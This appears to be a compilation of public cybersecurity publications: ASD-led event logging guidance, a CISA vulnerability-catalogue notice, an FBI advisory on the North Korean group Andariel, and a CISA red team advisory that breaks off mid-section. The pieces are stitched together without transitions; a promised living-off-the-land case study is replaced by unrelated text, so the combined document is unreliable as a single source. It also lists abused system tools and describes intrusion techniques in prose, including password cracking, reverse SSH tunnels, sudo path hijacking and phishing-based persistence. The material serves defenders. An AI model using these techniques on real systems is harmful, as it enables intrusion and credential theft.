This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) in cooperation with the following international partners: 

• United States (US) Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI) and the National Security Agency (NSA).
• United Kingdom (UK) National Cyber Security Centre (NCSC-UK).
• Canadian Centre for Cyber Security (CCCS).
• New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team (CERT NZ).
• Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and Computer Emergency Response Team Coordination Center (JPCERT/CC).
• The Republic of Korea National Intelligence Services (NIS) and NIS’s National Cyber Security Center (NCSC-Korea).
• Singapore Cyber Security Agency (CSA).
• The Netherlands General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD).

Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility. This guidance makes recommendations that improve an organization’s resilience in the current cyber threat environment, with regard for resourcing constraints. The guidance is of moderate technical complexity and assumes a basic understanding of event logging.

An effective event logging solution aims to:

• Send alerts to the network defenders responsible for monitoring when cyber security events such as critical software configuration changes are made or new software solutions are deployed.
• Identify cyber security events that may indicate a cyber security incident, such as malicious actors employing living off the land (LOTL) techniques or lateral movement post-compromise.
• Support incident response by revealing the scope and extent of a compromise.
• Monitor account compliance with organizational policies.
• Reduce alert noise, saving on costs associated with storage and query time.
• Enable network defenders to make agile and informed decisions based on prioritization of alerts and analytics.
• Ensure logs and the logging platforms are useable and performant for analysts.

There are four key factors to consider when pursuing logging best practices:

1. Enterprise-approved event logging policy.
2. Centralized event log access and correlation.
3. Secure storage and event log integrity.
4. Detection strategy for relevant threats.

To access the PDF version of this report, visit here.

Introduction

The increased prevalence of malicious actors employing LOTL techniques, such as LOTL binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging solution. As demonstrated in the joint-sealed publication Identifying and Mitigating Living Off the Land Techniques, advanced persistent threats (APTs) are employing LOTL techniques to evade detection. The purpose of this publication is to detail best practice guidance for event logging and threat detection for cloud services, enterprise networks, enterprise mobility, and operational technology (OT) networks. The guidance in this publication focuses on general best practices for event logging and threat detection; however, LOTL techniques feature as they provide a great case study due to the high difficulty in detecting them.

Audience

This guidance is technical in nature and is intended for those within medium to large organizations. As such, it is primarily aimed at:

• Senior information technology (IT) and OT decision makers.
• IT and OT operators.
• Network administrators.
• Critical infrastructure providers.

Best Practices

Enterprise-approved Event Logging Policy

Developing and implementing an enterprise approved logging policy improves an organization’s chances of detecting malicious behavior on their systems and enforces a consistent method of logging across an organization’s environments. The logging policy should take into consideration any shared responsibilities between service providers and the organization. The policy should also include details of the events to be logged, event logging facilities to be used, how event logs will be monitored, event log retention durations, and when to reassess which logs are worthy of collection.

Event Log Quality

Organizations are encouraged to implement an event logging policy focused on capturing high-quality cyber security events to aid network defenders in correctly identifying cyber security incidents. In the context of cyber security incident response and threat detection, event log quality refers to the types of events collected rather than how well a log is formatted. Log quality can vary between organizations due to differences in network environments, the reason behind the need to log, differences in critical assets and the organization’s risk appetite. 

Useful event logs enrich a network defender’s ability to assess security events to identify whether they are false positives or true positives. Implementing high-quality logging will aid network defenders in discovering LOTL techniques that are designed to appear benign in nature.

Note: Capturing a large volume of well-formatted logs can be invaluable for incident responders in forensics analysis scenarios. However, organizations are encouraged to properly organize logged data into ‘hot’ data storage that is readily available and searchable, or ‘cold’ data storage that has deprioritized availability and is stored through more economical solutions – an important consideration when evaluating an organization's log storage capacity.

For more information on how to prioritize collection of high-quality event logs please refer to CISA’s Guidance for Implementing M-21-3: Improving the Federal Government’s Investigative and Remediation Capabilities.[1] 

To strengthen detection of malicious actors employing LOTL techniques, some relevant considerations for event logging include:

• On Linux-based systems, logs capturing the use of curl, systemctl, systemd, python and other common LOLBins leveraged by malicious actors.
• On Microsoft Windows-based systems, logs capturing the use of wmic.exe, ntdsutil.exe, Netsh, cmd.exe, PowerShell, mshta.exe, rundll32.exe, resvr32.exe and other common LOLBins leveraged by malicious actors. Ensure that logging captures command execution, script block logging and module logging for PowerShell, and detailed tracking of administrative tasks.
• For cloud environments, logging all control plane operations, including API calls and end user logins. The control plane logs should be configured to capture read and write activities, administrative changes, and authentication events.

Captured Event Log Details

As a part of an organization’s event logging policy, captured event logs should contain sufficient detail to aid network defenders and incident responders. If a logging solution fails to capture data relevant to security, its effectiveness as a cyber security incident detection capability is heavily impacted.

The US Office of Management and Budget's M-21-31[2] outlines a good baseline for what an event log should capture, if applicable:

• Properly formatted and accurate timestamp (millisecond granularity is ideal).
• Event type (status code).
• Device identifier (mac address or other unique identifier).
• Session/transaction ID.
• Autonomous system number.
• Source and destination IP (includes both IPv4 and IPv6).
• Status code.
• Response time.
• Additional headers (e.g., HTTP headers).
• The user ID, where appropriate.
• The command executed, where appropriate.
• A unique event identifier to assist with event correlation, where possible.

Note: Where possible, all data should be formatted as ‘key-value-pairs’ to allow for easier extraction.

Operational Technology Considerations

Network administrators and network operators should take into consideration the OT devices within their OT networks. Most OT devices use embedded software that is memory and/or processor constrained. An excessive level of logging could adversely affect the operation of those OT devices. Additionally, such OT devices may not be capable of generating detailed logs, in which case, sensors can be used to supplement logging capabilities. Out-of-band log communications, or generating logs based on error codes and the payloads of existing communications, can account for embedded devices with limited logging capabilities.

Additional Resources

• ASD’s ACSC Information Security Manual (ISM) provides event log details to record in the Guidelines for System Monitoring.
• CISA’s Guidance for Implementing M-21-31: Improving the Federal Government’s Investigative and Remediation Capabilities details another approach to prioritizing log collection and is aimed at US federal civilian executive branch organizations.
• NIST has outlined OT considerations for event logging in their Guide to Operational Technology (OT) Security.
• For examples of detection uses cases, consider visiting the MITRE ATT&CK® list of data sources.

Content and Format Consistency

When centralizing event logs, organizations should consider using a structured log format, such as JSON, where each type of log captures and presents content consistently (that is, consistent schema, format, and order). This is particularly important when event logs have been forwarded to a central storage facility as this improves a network defender’s ability to search for, filter and correlate event logs. Since logs may vary in structure (or lack thereof), implementing a method of automated log normalization is recommended. This is an important consideration for logs that can change over time or without notice such as software and software-as-a-service (SaaS) logs.

Timestamp Consistency

Organizations should consider establishing an accurate and trustworthy time source and use this consistently across all systems to assist network defenders in identifying connections between event logs. This should also include using the same date-time format across all systems. Where possible, organizations should use multiple accurate time sources in case the primary time source becomes degraded or unavailable. Note that, particularly in distributed systems, time zones and distance can influence how timestamps read in relation to each other. Network owners, system owners and cyber security incident responders are encouraged to understand how this could impact their own environments. ASD and co-authors urge organizations to consider implementing the recommendations below to help ensure consistent timestamp collection.

• Time servers should be synchronized and validated throughout all environments and set to capture significant events, such as device boots and reboots.
• Using Coordinated Universal Time (UTC) has the advantage of no time zones as well as no daylight savings, and is the preferred time standard.
  • Implement ISO 8601 formatting, with the year listed first, followed by the month, day, hour, minutes, seconds, and milliseconds (e.g., 2024-07-25T20:54:59.649Z).
• Timesharing should be unidirectional. The OT environment should synchronize time sync with the IT environment and not the other way around.
• Data historians may be implemented on some operational assets to record and store time-series data of industrial processes running on the computer system. These can provide an additional source of event log data for OT networks.

Additional Resources

• ASD has released Windows Event Logging and Forwarding guidance that details important event categories and recommendations for configurations, log retention periods and event forwarding.
• For more information about logging, please explore CISA’s Logging Made Easy (LME), a no-cost solution providing essential log management for small to medium-sized organizations, on CISA’s website or GitHub page.
• The Joint SIGINT Cyber Unit (JSCU) of the AIVD and MIVD has published a repository on GitHub with a Microsoft Windows event logging and collections baseline focused on finding balance between forensic value and optimizing retention. You can find this repository on the JSCU’s GitHub.

Event Log Retention

Organizations should ensure they retain logs for long enough to support cyber security incident investigations. Default log retention periods are often insufficient. Log retention periods should be informed by an assessment of the risks to a given system. When assessing the risks to a system, consider that in some cases, it can take up to 18 months to discover a cyber security incident and some malware can dwell on the network from 70 to 200 days before causing overt harm.[3] Log retention periods should also be compliant with any regulatory requirements and cyber security frameworks that may apply in an organization’s jurisdiction. Logs that are crucial in confirming an intrusion and its impact should be prioritized for longer retention. 

It is important to review log storage allocations, in parallel with retention periods. Insufficient storage is a common obstacle to log retention. For example, many systems will overwrite old logs when their storage allocation is exhausted. The longer that logs can be kept, the higher the chances are of determining the extent of a cyber security incident, including the potential intrusion vectors that require remediation. For effective security logging practices, organizations should implement data tiering such as hot and cold storage. This ensures that logs can be promptly retrieved to facilitate querying and threat detection.

Centralized Log Collection and Correlation

The following sections detail prioritized lists of log sources for enterprise networks, OT, cloud computing and enterprise mobility using mobile computing devices. The prioritization takes into consideration the likelihood that the logged asset will be targeted by a malicious actor, as well as the impact if the asset were to be compromised. It also prioritizes log sources that can assist in identifying LOTL techniques. Please note that this is not an exhaustive list of log sources and their threats, and their priority may differ between organizations.

Logging Priorities for Enterprise Networks

Enterprise networks face a large variety of cyber threats. These include malware, malicious insiders, and exploitation of unpatched applications and services. In the context of LOTL, enterprise networks provide malicious actors with a wide variety of native tools to exploit.

ASD and co-authors recommend that organizations prioritize the following log sources within their enterprise network:

1. Critical systems and data holdings likely to be targeted.
2. Internet-facing services, including remote access, network metadata, and their underlying server operating system.
3. Identity and domain management servers.
4. Any other critical servers.
5. Edge devices such as boundary routers and firewalls.
6. Administrative workstations.
7. Highly privileged systems such as configuration management, performance and availability monitoring (in cases where privileged access is used), Continuous Integration/Continuous Delivery (CI/CD), vulnerability scanning services, secret and privilege management.
8. Data repositories.
9. Security-related and critical software.
10. User computers.
11. User application logs.
12. Web proxies used by organizational users and service accounts.
13. DNS services used by organizational users.
14. Email servers.
15. DHCP servers.
16. Legacy IT assets (that are not previously captured in critical or internet-facing services).

ASD and co-authors recommend organizations monitor lower priority logs as well. These include:

• Underlying infrastructure, such as hypervisor hosts.
• IT devices, such as printers.
• Network components such as application gateways.

Logging Priorities for Operational Technology

Historically, IT and OT have operated separately and have provided distinct functions within organizations. Advancements in technology and digital transformation have led to the growing interconnectedness and convergence of these networks. Organizations are integrating IT and OT networks to enable the seamless flow of data between management systems and industrial operations. Their integration has introduced new cyber threats to OT networks. For example, malicious actors can access OT networks through IT networks by exploiting unpatched vulnerabilities, delivering malware, or conducting denial-of-service campaigns to impact critical services. 

ASD and co-authors recommend that organizations prioritize the following log sources in their OT environment:

1. OT devices critical to safety and service delivery, except for air-gapped systems.[4]
2. Internet-facing OT devices.
3. OT devices accessible via network boundaries.

Note that in cases where OT devices do not support logging, device logs are not available, or are available in a non-standard format, it is good practice to ensure network traffic and communications to and from the OT devices are logged.

Logging Priorities for Enterprise Mobility Using Mobile Computing Devices

Enterprise mobility is an important aspect of an organization’s security posture. Mobile device management (MDM) solutions allow organizations to manage the security of their enterprise mobility, typically including logging functionality. In the context of enterprise mobility, the aim of effective event logging is to detect compromised accounts or devices; for example, due to phishing or interactions with malicious applications and websites.

ASD and co-authors recommend organizations priorities the following log sources in their enterprise mobility solution:

1. Web proxies used by organizational users.
2. Organization operated DNS services.
3. Device security posture of organizationally managed devices.
4. Device behavior of organizationally managed devices.
5. User account behavior such as sign-ins.
6. VPN solutions.
7. MDM and Mobile Application Management (MAM) events.[5]

Additional monitoring should be implemented in collaboration with the telecommunications network provider. Such monitoring includes:

• Signaling exploitation.
• Binary/invisible SMS.
• CLI spoofing.
• SIM/eSIM activities such as SIM swapping.
• Null cipher downgrade.
• Connection downgrade (false base station).
• Network API/query against user.
• Roaming traffic protection.
• Roaming steering.

Organizations should obtain legal advice about what can be logged from any personally owned mobile devices that are enrolled in an MDM solution. For example, logging GPS location may be subject to restrictions.

Logging Priorities for Cloud Computing

ASD and co-authors recommend organizations adjust event logging practices in accordance with the cloud service that is administered, whether infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS), or SaaS are implemented.  For example, IaaS would include a significant amount of logging responsibility on the tenant, whereas SaaS would place a significant amount of the logging responsibility on the provider. Therefore, organizations should coordinate closely with their cloud service provider to understand the shared-responsibility model in place, as it will influence their logging priorities. Logging priorities will also be influenced by different cloud computing service models and deployment models (that is, public, private, hybrid, community). Where privacy and data sovereignty laws apply, logging priorities may also be influenced by the location of the cloud service provider’s infrastructure. See NSA’s Manage Cloud Logs for Effective Threat Hunting guidance for additional information.

Organizations should prioritize the following log sources in their use of cloud computing services:

1. Critical systems and data holdings likely to be targeted.
2. Internet-facing services (including remote access) and, where applicable, their underlying server operating systems.
3. Use of the tenant’s user accounts that access and administer cloud services.
4. Logs for administrative configuration changes.
5. Logs for the creation, deletion and modification of all security principals, including setting and changing permissions.
6. Authentication success and/or failures to third party services (e.g., SAML/OAuth).
7. Logs generated by the cloud services, including logs for cloud APIs, all network-related events, compliance events and billing events.

Secure Storage and Event Log Integrity

ASD and co-authors recommend that organizations implement a centralized event logging facility such as a secured data lake to enable log aggregation and then forward select, processed logs to analytic tools, such as security information and event management (SIEM) solution and extended detection and response (XDR) solutions. Many commercially available network infrastructure devices have limited local storage. Forwarding event logs to a centralized and secure storage capability prevents the loss of logs once the local device’s storage is exhausted [CPG 2.U]. This can be further mitigated by ensuring default maximum event log storage sizes are configured appropriately on local devices. In the event of a cyber security incident, an absence of historical event logs will frequently have a negative impact on cyber security incident response activities. 

Secure Transport and Storage of Event Logs

ASD and co-authors recommend that organizations implement secure mechanisms such as Transport Layer Security (TLS) 1.3 and methods of cryptographic verification to ensure the integrity of event logs in-transit and at rest. Organizations should prioritize securing and restricting access to event logs that have a justified requirement to record sensitive data.

Protecting Event Logs from Unauthorized Access, Modification and Deletion

It is important to perform event log aggregation as some malicious actors are known to modify or delete local system event logs to avoid detection and to delay or degrade the efficacy of cyber security incident response. Logs may contain sensitive data that is useful to a malicious actor. As a result, users should only have access to the event logs they need to do their job.

An event logging facility should enable the protection of logs from unauthorized modification and deletion. Ensure that only personnel with a justified requirement have permission to delete or modify event logs and view the audit logs for access to the centralized logging environment.  The storage of logs should be in a separate or segmented network with additional security controls to reduce the risk of logs being tampered with in the event of network or system compromise. Events logs should also be backed up and data redundancy practices should be implemented.

Organizations are encouraged to harden and segment their SIEM solutions from general IT environments. SIEMs are attractive targets for malicious actors because they contain a wealth of information, provide an analysis function, and can be a single point of failure in an organization’s detection capability.  Organizations should consider filtering event logs before sending them to a SIEM or XDR to ensure it is receiving the most valuable logs to minimize any additional costs or capacity issues.

Centralized Event Logging Enables Threat Detection

The aggregation of event logs to a central logging facility that a SIEM can draw from enables the identification of: 

• Deviations from a baseline.
  • A baseline should include installed tools and software, user account behavior, network traffic, system intercommunications and other items, as applicable. Particular attention should be paid to privileged user accounts and critical assets such as domain controllers.
  • A baseline is derived by performing an analysis of normal behavior of some user accounts and establishing ‘always abnormal’ conditions for those same accounts.
• Cyber security events.
  • For the purpose of this document, a cyber security event is an occurrence of a system, service or network state indicating a possible breach of security policy, failure of safeguards or a previously unknown situation that may be relevant to security.
• Cyber security incidents.
  • For the purpose of this document, a cyber security incident is an unwanted or unexpected cyber security event, or a series of such events, that either has compromised business operations or has a significant probability of compromising business operations.

Timely Ingestion

Timely ingestion of event logs is important in the early detection of a cyber security events and cyber security incidents. If the generation, collection and ingestion of event logs is delayed, the organization’s ability to identify cyber security incidents is also delayed.

Detection Strategy for Relevant Threats

Detecting Living Off the Land Techniques

ASD and co-authors recommend that organizations consider implementing user and entity behavioral analytics capabilities to enable automated detection of behavioral anomalies on networks, devices, or accounts. SIEMs can detect anomalous activity by comparing event logs to a baseline of business-as-usual traffic and activity. Behavioral analytics plays a key role in detecting malicious actors employing LOTL techniques. Below is a case study that shows how threat actors leveraged LOTL to infiltrate Windows-based systems.

• CVE-2024-38189 Microsoft Project Remote Code Execution Vulnerability
• CVE-2024-38178 Microsoft Windows Scripting Engine Memory Corruption Vulnerability
• CVE-2024-38213 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
• CVE-2024-38193 Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability
• CVE-2024-38106 Microsoft Windows Kernel Privilege Escalation Vulnerability
• CVE-2024-38107 Microsoft Windows Power Dependency Coordinator Privilege Escalation Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:

• U.S. Cyber National Mission Force (CNMF)
• U.S. Cybersecurity and Infrastructure Security Agency (CISA)
• U.S. Department of Defense Cyber Crime Center (DC3)
• U.S. National Security Agency (NSA)
• Republic of Korea’s National Intelligence Service (NIS)
• Republic of Korea’s National Police Agency (NPA)
• United Kingdom’s National Cyber Security Centre (NCSC)

The RGB 3^rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3^rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration. 

The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.

The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations:

For additional information on DPRK state-sponsored malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.

Download the PDF version of this report:

For a downloadable copy of associated indicators of compromise (IOCs), see:

Technical Details

RGB 3^rd Bureau

Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations.

Cyber Espionage

The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.

In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture. Then, the team works directly with the organization’s network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team’s goal is to assist the organization with refining their detection, response, and hunt capabilities—particularly hunting unknown threats.

In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization’s detection capabilities and cyber posture.

During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim’s Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets. The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase.

The red team’s findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team’s compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs.

The red team’s findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an “allowlist” approach to network behavior and systems, rather than a “denylist” approach, which predominantly results in an unmanageable amount of noise. The red team’s findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk:

• Lesson learned: The assessed organization had insufficient controls to prevent and detect malicious activity.
• Lesson learned: The organization did not effectively or efficiently collect, retain, and analyze logs.
• Lesson learned: Bureaucratic processes and decentralized teams hindered the organization’s network defenders.
• Lesson learned: A “known-bad” detection approach hampered detection of alternate TTPs.

To reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below:

• Apply defense-in-depth principles by using multiple layers of security to ensure comprehensive analysis and detection of possible intrusions.
• Use robust network segmentation to impede lateral movement across the network.
• Establish baselines of network traffic, application execution, and account authentication. Use these baselines to enforce an “allowlist” philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric.

CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise:

• Eliminate default passwords.
• Provide logging at no additional charge.
• Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents.

Download the PDF version of this report:

INTRODUCTION

CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. § 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization. CISA conducted the SILENTSHIELD assessment over an approximately eight-month period in 2023, with three of the months consisting of a technical collaboration phase:

• Adversary Emulation Phase: The team started by emulating a sophisticated nation-state actor by simulating known initial access and post-exploitation TTPs. The team’s goal was to compromise the assessed organization’s domain and identify attack paths to other networks. After completion of their initial objectives, the team diversified its deployed tools and tradecraft to mimic a wider and often less sophisticated set of threat actors to elicit network defender attention. CISA red team members did not clean up or delete system logs, allowing defenders to investigate all artifacts and identify the full scope of a breach.
• Collaboration Phase: The SILENTSHIELD team met regularly with senior staff and technical personnel to discuss issues with the organization’s cyber defensive capabilities. During this phase, the team:
  • Proposed new behavior-based and tool-agnostic detections to uncover additional tradecraft used during the Adversary Emulation Phase. They also evaluated the organization’s improvements according to current CISA priorities and public guidance.
  • Troubleshot existing detection steps to show how certain TTPs evaded IOC-based detections.
  • Deconflicted events from CISA red team activity, indicating unexpected network/application behavior or the potential presence of a real adversary in the network.
    
    Note: The team’s goal during this phase was to build the organization’s ability to detect malicious activity based on adversary behavior (i.e., TTPs) vice relying on known IOCs.

This advisory, drafted in coordination with the assessed organization, details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization’s defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. 

During the Adversary Emulation phase, the red team gained initial access to the organization’s Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team’s activity and TTPs.

Figure 1: SILENTSHIELD assessment timeline

Adversary Emulation Phase

Exploitation of the Solaris Enclave

Reconnaissance, Initial Access, and Command and Control

CISA’s red team used open source tools and third-party services to probe the organization’s internet-facing surface [T1594]. This included non-intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization’s web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access.

The exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80 and 443, the RAT enabled consistent command and control (C2) traffic [T1071.001].

Note: After gaining access, the team promptly informed the organization’s trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response. About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023.

Credential Access, Command and Control, and Privilege Escalation

Once on SERVER 1, the red team probed the host’s files and folder structure [T1005] and identified several old and globally accessible .tar backup files, which included a readable copy of an /etc/shadow file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account’s weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80 and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1’s expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account’s password to a strong password.

Figure 2: Exploitation of the Solaris Enclave

The team discovered ACCOUNT 1 was a local administrator with sudo/root access and used it to move laterally (see the next section).

Lateral Movement and Persistence

Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004].

Some servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in-memory footprints. These tools communicated to a red team redirector over TCP/443, through valid HTTPS messages, and over SSH through non-standard ports (80 and 443) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports. 

The team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3).

Figure 3: Example of Lateral Movement in the Solaris Enclave

Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user’s .bash_history. These data mined credentials provided further avenues for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid and gid values to access all files and folders.

To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron utility [T1053.003], as well as the at utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated.

Full Enclave Compromise

Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo with a relative path instead of the absolute path /usr/local/bin/sudo. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account’s password [T1574.007].

The harvested password granted unrestricted privileged access to the entire Solaris enclave.

Exploitation of the Windows Domain

While the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 4).

Figure 4: Exploitation of Solaris enclave

The team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials.

Reconnaissance and Initial Access

While attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization. They harvested employee names [T1589.003] and used the information to derive email addresses based on the target’s email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation.

The team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization’s tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon.

Credentialed Access and Privilege Escalation

